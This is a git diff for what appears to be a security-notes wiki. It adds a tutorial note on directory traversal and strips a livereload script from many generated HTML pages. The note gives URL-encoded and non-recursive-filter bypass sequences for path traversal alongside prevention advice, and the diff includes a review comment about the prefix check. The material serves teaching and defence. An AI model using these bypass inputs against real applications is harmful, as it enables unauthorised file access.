diff --git a/Notes/Exploitation/Web/Directory Traversal.md b/Notes/Exploitation/Web/Directory Traversal.md new file mode 100644 index 00000000..3a310499 --- /dev/null +++ b/Notes/Exploitation/Web/Directory Traversal.md 
@@ -0,0 +1,18 @@ +# Directory Traversal +A *directory traversal* (also known as *path traversal*) is a type of attack which allows an adversary to access files *outside* the web root directory and usually occurs when there is no proper user input sanitisation. + +If an application is vulnerable to path traversal, then one can abuse relative paths to escape from the web root and access arbitrary files on the file system. + +![](Resources/Images/Directory%20Traversal/Basic%20Directory%20Traversal.png) + +One should look for directory traversals anywhere that they see a filename - this can be in a URL parameter, in the URL path itself or in any additional resources that the application loads. + +# Filter Bypass +URL encoding can be used to bypass many filters which try to filter out the `../` sequence from user input because they literally look for this specific characters and not their URL representations. The URL encoding of the `.` character is `%2e` and the `/` character gets encoded to `%2f`. The whole sequence can therefore be represented as `%2e%2e%2f`. + +Some filters try to strip out the `../` sequence before handling requests. Oftentimes, however, these filters are *non-recursive* and only check the input once. Since the filter only goes over the string once and does not check the resulting string as well, the sequence `....//` will be changed to `../` after the middle `../` is removed. + +# Prevention +One should avoid passing user input to file system APIs entirely. If this is absolutely impossible to implement, then user input should be validated before processing. In the ideal case this should happen by comparing the input with a whitelist of permitted values. At the very least, one should verify that the user input contains only permitted characters such as alphanumeric ones. + +After such validation, the user input should be appended to the base directory and the file system API should be used canonicalise the resulting path. 
Ultimately, one should verify that this canonical path begins with the base directory. \ No newline at end of file diff --git a/Notes/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png b/Notes/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png new file mode 100644 index 00000000..8cd2889e Binary files /dev/null and b/Notes/Exploitation/Web/Resources/Images/Directory Traversal/Basic Directory Traversal.png differ diff --git a/Notes/SUMMARY.md b/Notes/SUMMARY.md index 46a8d525..4a6ec8eb 100644 --- a/Notes/SUMMARY.md +++ b/Notes/SUMMARY.md @@ -47,6 +47,7 @@ - [Cross-Site Scripting (XSS)](Exploitation/Web/Cross-Site%20Scripting%20(XSS).md) - [Cross-Site Request Forgery](Exploitation/Web/Cross-Site%20Request%20Forgery.md) - [WebSockets](Exploitation/Web/WebSockets.md) + - [Directory Traversal](Exploitation/Web/Directory%20Traversal.md) - [HTTP Parameter Pollution](Exploitation/Web/HTTP%20Parameter%20Pollution.md) - [Host Header Injection](Exploitation/Web/Host%20Header%20Injection.md) - [Windows](Exploitation/Windows/index.md) diff --git a/docs/404.html b/docs/404.html index 272ca737..5b58cc99 100644 --- a/docs/404.html +++ b/docs/404.html @@ -101,7 +101,7 @@ @@ -176,22 +176,6 @@
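Review bot: the closing Prevention step, "verify that this canonical path begins with the base directory", should spell out that the comparison must be made against the base directory with its trailing path separator included (`/var/www/html/` rather than `/var/www/html`); a plain prefix comparison on the bare directory name also accepts any sibling directory whose name merely starts with the same string, which defeats the check the whole section builds up to. Two wording fixes in the same hunk: "they literally look for this specific characters" should read "these specific characters", and "the file system API should be used canonicalise the resulting path" is missing "to" before "canonicalise".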

- - diff --git a/docs/Cryptography/Breaking Classical Cryptrography.html b/docs/Cryptography/Breaking Classical Cryptrography.html index 0aa2e7c8..f7ef5034 100644 --- a/docs/Cryptography/Breaking Classical Cryptrography.html +++ b/docs/Cryptography/Breaking Classical Cryptrography.html @@ -100,7 +100,7 @@ @@ -209,22 +209,6 @@

The - - diff --git a/docs/Cryptography/Computer Science Prerequisites.html b/docs/Cryptography/Computer Science Prerequisites.html index 57d7605f..02c0997b 100644 --- a/docs/Cryptography/Computer Science Prerequisites.html +++ b/docs/Cryptography/Computer Science Prerequisites.html @@ -100,7 +100,7 @@ @@ -331,22 +331,6 @@

Problem Class - - diff --git a/docs/Cryptography/Hash Functions/Birthday Attacks.html b/docs/Cryptography/Hash Functions/Birthday Attacks.html index 58611ddb..a0f2c449 100644 --- a/docs/Cryptography/Hash Functions/Birthday Attacks.html +++ b/docs/Cryptography/Hash Functions/Birthday Attacks.html @@ -100,7 +100,7 @@ @@ -270,22 +270,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Hash Functions/Davies-Meyer Transform.html b/docs/Cryptography/Hash Functions/Davies-Meyer Transform.html index f40a4096..b5cb6d7f 100644 --- a/docs/Cryptography/Hash Functions/Davies-Meyer Transform.html +++ b/docs/Cryptography/Hash Functions/Davies-Meyer Transform.html @@ -100,7 +100,7 @@ @@ -215,22 +215,6 @@

Security

- - diff --git "a/docs/Cryptography/Hash Functions/Merkle-Damg\303\245rd Transform.html" "b/docs/Cryptography/Hash Functions/Merkle-Damg\303\245rd Transform.html" index f30dfde8..0443f5a9 100644 --- "a/docs/Cryptography/Hash Functions/Merkle-Damg\303\245rd Transform.html" +++ "b/docs/Cryptography/Hash Functions/Merkle-Damg\303\245rd Transform.html" @@ -100,7 +100,7 @@ @@ -226,22 +226,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Hash Functions/Security Definitions.html b/docs/Cryptography/Hash Functions/Security Definitions.html index 24ed8135..b8262c23 100644 --- a/docs/Cryptography/Hash Functions/Security Definitions.html +++ b/docs/Cryptography/Hash Functions/Security Definitions.html @@ -100,7 +100,7 @@ @@ -253,22 +253,6 @@

Col - - diff --git a/docs/Cryptography/Hash Functions/index.html b/docs/Cryptography/Hash Functions/index.html index 0396a355..d58db6a6 100644 --- a/docs/Cryptography/Hash Functions/index.html +++ b/docs/Cryptography/Hash Functions/index.html @@ -100,7 +100,7 @@ @@ -198,22 +198,6 @@

Introduction - - diff --git a/docs/Cryptography/Integrity Verification/Merkle Trees.html b/docs/Cryptography/Integrity Verification/Merkle Trees.html index 771d6bf2..ce8177ee 100644 --- a/docs/Cryptography/Integrity Verification/Merkle Trees.html +++ b/docs/Cryptography/Integrity Verification/Merkle Trees.html @@ -100,7 +100,7 @@ @@ -191,22 +191,6 @@

Merkle Trees - - diff --git a/docs/Cryptography/Integrity Verification/index.html b/docs/Cryptography/Integrity Verification/index.html index 84bcabb9..ff2012b4 100644 --- a/docs/Cryptography/Integrity Verification/index.html +++ b/docs/Cryptography/Integrity Verification/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html b/docs/Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html index ac776dac..2c2639c4 100644 --- a/docs/Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html +++ b/docs/Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html @@ -100,7 +100,7 @@ @@ -243,22 +243,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Key Management/Key Exchange/Security Definitions.html b/docs/Cryptography/Key Management/Key Exchange/Security Definitions.html index 34e9ef91..d9ab9e05 100644 --- a/docs/Cryptography/Key Management/Key Exchange/Security Definitions.html +++ b/docs/Cryptography/Key Management/Key Exchange/Security Definitions.html @@ -100,7 +100,7 @@ @@ -186,22 +186,6 @@

Introduction - - diff --git a/docs/Cryptography/Key Management/Key Exchange/index.html b/docs/Cryptography/Key Management/Key Exchange/index.html index 52c5f364..6bf9e287 100644 --- a/docs/Cryptography/Key Management/Key Exchange/index.html +++ b/docs/Cryptography/Key Management/Key Exchange/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cryptography/Key Management/index.html b/docs/Cryptography/Key Management/index.html index ec4d2f47..163eeac2 100644 --- a/docs/Cryptography/Key Management/index.html +++ b/docs/Cryptography/Key Management/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cryptography/Mathematical Prerequisites.html b/docs/Cryptography/Mathematical Prerequisites.html index 045d2128..0a376de9 100644 --- a/docs/Cryptography/Mathematical Prerequisites.html +++ b/docs/Cryptography/Mathematical Prerequisites.html @@ -100,7 +100,7 @@ @@ -609,22 +609,6 @@

Distributions - - diff --git a/docs/Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html b/docs/Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html index e969fcfa..5d208e1e 100644 --- a/docs/Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html +++ b/docs/Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html @@ -100,7 +100,7 @@ @@ -277,22 +277,6 @@

PRFGs from PR - - diff --git a/docs/Cryptography/Primitives/Pseudorandom Generators (PRGs).html b/docs/Cryptography/Primitives/Pseudorandom Generators (PRGs).html index 4f90aa1c..351012f0 100644 --- a/docs/Cryptography/Primitives/Pseudorandom Generators (PRGs).html +++ b/docs/Cryptography/Primitives/Pseudorandom Generators (PRGs).html @@ -100,7 +100,7 @@ @@ -320,22 +320,6 @@

Leap of Faith - - diff --git a/docs/Cryptography/Primitives/Pseudorandom Permutations (PRPs).html b/docs/Cryptography/Primitives/Pseudorandom Permutations (PRPs).html index b021d552..2cf6455a 100644 --- a/docs/Cryptography/Primitives/Pseudorandom Permutations (PRPs).html +++ b/docs/Cryptography/Primitives/Pseudorandom Permutations (PRPs).html @@ -100,7 +100,7 @@ @@ -284,22 +284,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Primitives/index.html b/docs/Cryptography/Primitives/index.html index c0ac2ce9..6acc0b72 100644 --- a/docs/Cryptography/Primitives/index.html +++ b/docs/Cryptography/Primitives/index.html @@ -100,7 +100,7 @@ @@ -177,22 +177,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html b/docs/Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html index d1eb6cd7..080da3a2 100644 --- a/docs/Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html @@ -100,7 +100,7 @@ @@ -268,22 +268,6 @@

Encrypt-t - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html index 45be89ad..371bef77 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html @@ -100,7 +100,7 @@ @@ -212,22 +212,6 @@

Decryption

- - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html index 4eaa59fe..bd77e299 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html @@ -100,7 +100,7 @@ @@ -196,22 +196,6 @@

Ciphe - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html index b0d5194d..15f4757e 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html @@ -100,7 +100,7 @@ @@ -204,22 +204,6 @@

IV Reuse Atta - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html index 649cfe15..649f4a6c 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html @@ -100,7 +100,7 @@ @@ -215,22 +215,6 @@

IV Reuse Atta - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Electronic Cookbook (ECB) Mode.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Electronic Cookbook (ECB) Mode.html index 180550fa..d857d9a2 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Electronic Cookbook (ECB) Mode.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Electronic Cookbook (ECB) Mode.html @@ -100,7 +100,7 @@ @@ -204,22 +204,6 @@

Sec - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/index.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/index.html index 953de783..95accb30 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/index.html @@ -100,7 +100,7 @@ @@ -195,22 +195,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html index d65228d6..c789be9a 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html @@ -100,7 +100,7 @@ @@ -202,22 +202,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/index.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/index.html index 6c5d04ff..0cc94d0a 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/index.html @@ -100,7 +100,7 @@ @@ -219,22 +219,6 @@

Implementation< - - diff --git a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Fixed-Length MACs.html b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Fixed-Length MACs.html index f4c9cd55..a6aa5c39 100644 --- a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Fixed-Length MACs.html +++ b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Fixed-Length MACs.html @@ -100,7 +100,7 @@ @@ -279,22 +279,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Hash-Based MACs (HMAC).html b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Hash-Based MACs (HMAC).html index 1864a513..52fd48e0 100644 --- a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Hash-Based MACs (HMAC).html +++ b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Hash-Based MACs (HMAC).html @@ -100,7 +100,7 @@ @@ -204,22 +204,6 @@

Security of - - diff --git a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html index a51b854f..7358fde5 100644 --- a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html @@ -100,7 +100,7 @@ @@ -292,22 +292,6 @@

Implement - - diff --git a/docs/Cryptography/Private-Key Cryptography/One-Time Pad.html b/docs/Cryptography/Private-Key Cryptography/One-Time Pad.html index 1dd16b86..4119dbd3 100644 --- a/docs/Cryptography/Private-Key Cryptography/One-Time Pad.html +++ b/docs/Cryptography/Private-Key Cryptography/One-Time Pad.html @@ -100,7 +100,7 @@ @@ -204,22 +204,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/HMAC-Based One-Time Passwords (HOTP).html b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/HMAC-Based One-Time Passwords (HOTP).html index 211c22e2..449290a4 100644 --- a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/HMAC-Based One-Time Passwords (HOTP).html +++ b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/HMAC-Based One-Time Passwords (HOTP).html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/Time-Based One-Time Passwords (TOTP).html b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/Time-Based One-Time Passwords (TOTP).html index 3d086057..d1772133 100644 --- a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/Time-Based One-Time Passwords (TOTP).html +++ b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/Time-Based One-Time Passwords (TOTP).html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/index.html b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/index.html index 26bc2761..97f0aa46 100644 --- a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/index.html +++ b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/index.html @@ -100,7 +100,7 @@ @@ -235,22 +235,6 @@

Replay Attacks< - - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html index e1c38dbc..80495a07 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html @@ -100,7 +100,7 @@ @@ -221,22 +221,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html index d97b1ac7..76f082e9 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html @@ -100,7 +100,7 @@ @@ -285,22 +285,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext Integrity (CI).html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext Integrity (CI).html index a51e79af..480cc5d2 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext Integrity (CI).html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext Integrity (CI).html @@ -100,7 +100,7 @@ @@ -195,22 +195,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Perfect Secrecy.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Perfect Secrecy.html index a0a4711b..7e812c81 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Perfect Secrecy.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Perfect Secrecy.html @@ -100,7 +100,7 @@ @@ -279,22 +279,6 @@

L - - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html index 3b316059..314c3c63 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html @@ -100,7 +100,7 @@ @@ -255,22 +255,6 @@

Leap of Faith - - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/index.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/index.html index e8016c9f..0824f13e 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/index.html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/P vs NP.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/P vs NP.html index 3f8ebc8d..40a47f86 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/P vs NP.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/P vs NP.html @@ -100,7 +100,7 @@ @@ -205,22 +205,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html index 91ac5bff..e9560ead 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html @@ -100,7 +100,7 @@ @@ -346,22 +346,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/index.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/index.html index 17ba305d..08a90a73 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/index.html @@ -100,7 +100,7 @@ @@ -193,22 +193,6 @@

Threat Models - - diff --git a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/Grain-128a.html b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/Grain-128a.html index a1e5743a..a7b2a281 100644 --- a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/Grain-128a.html +++ b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/Grain-128a.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html index 712cc858..8e2956cb 100644 --- a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html @@ -100,7 +100,7 @@ @@ -206,22 +206,6 @@

Filtered FSRs - - diff --git a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/index.html b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/index.html index e295dc11..ab9ab6fd 100644 --- a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/index.html @@ -100,7 +100,7 @@ @@ -221,22 +221,6 @@

Security

- - diff --git a/docs/Cryptography/Private-Key Cryptography/index.html b/docs/Cryptography/Private-Key Cryptography/index.html index e721f87a..41244c5f 100644 --- a/docs/Cryptography/Private-Key Cryptography/index.html +++ b/docs/Cryptography/Private-Key Cryptography/index.html @@ -100,7 +100,7 @@ @@ -202,22 +202,6 @@

Introduction - - diff --git a/docs/Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html b/docs/Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html index b8f0a798..2ac68da4 100644 --- a/docs/Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html +++ b/docs/Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html @@ -100,7 +100,7 @@ @@ -324,22 +324,6 @@

Cyclic Groups - - diff --git a/docs/Cryptography/Public-Key Cryptography/Security Definitions/Chosen-Plaintext Attack (CPA).html b/docs/Cryptography/Public-Key Cryptography/Security Definitions/Chosen-Plaintext Attack (CPA).html index 6341650a..910cded7 100644 --- a/docs/Cryptography/Public-Key Cryptography/Security Definitions/Chosen-Plaintext Attack (CPA).html +++ b/docs/Cryptography/Public-Key Cryptography/Security Definitions/Chosen-Plaintext Attack (CPA).html @@ -100,7 +100,7 @@ @@ -207,22 +207,6 @@

Introduction - - diff --git a/docs/Cryptography/Public-Key Cryptography/Security Definitions/Perfect Secrecy.html b/docs/Cryptography/Public-Key Cryptography/Security Definitions/Perfect Secrecy.html index 52a8c33d..c7d6090d 100644 --- a/docs/Cryptography/Public-Key Cryptography/Security Definitions/Perfect Secrecy.html +++ b/docs/Cryptography/Public-Key Cryptography/Security Definitions/Perfect Secrecy.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Cryptography/Public-Key Cryptography/Security Definitions/index.html b/docs/Cryptography/Public-Key Cryptography/Security Definitions/index.html index 4656e30b..dd379218 100644 --- a/docs/Cryptography/Public-Key Cryptography/Security Definitions/index.html +++ b/docs/Cryptography/Public-Key Cryptography/Security Definitions/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cryptography/Public-Key Cryptography/index.html b/docs/Cryptography/Public-Key Cryptography/index.html index 395b77fb..fc160503 100644 --- a/docs/Cryptography/Public-Key Cryptography/index.html +++ b/docs/Cryptography/Public-Key Cryptography/index.html @@ -100,7 +100,7 @@ @@ -207,22 +207,6 @@

P - - diff --git a/docs/Cryptography/index.html b/docs/Cryptography/index.html index 5e93317a..bf3ad47d 100644 --- a/docs/Cryptography/index.html +++ b/docs/Cryptography/index.html @@ -100,7 +100,7 @@ @@ -251,22 +251,6 @@

Further Readi - - diff --git a/docs/Cyberclopaedia/Contributing.html b/docs/Cyberclopaedia/Contributing.html index 1845b937..dba071fe 100644 --- a/docs/Cyberclopaedia/Contributing.html +++ b/docs/Cyberclopaedia/Contributing.html @@ -100,7 +100,7 @@ @@ -205,22 +205,6 @@

Licensing

- - diff --git a/docs/Cyberclopaedia/License.html b/docs/Cyberclopaedia/License.html index 678be2b3..359bcafa 100644 --- a/docs/Cyberclopaedia/License.html +++ b/docs/Cyberclopaedia/License.html @@ -100,7 +100,7 @@ @@ -179,22 +179,6 @@

The Cyberclopaedia

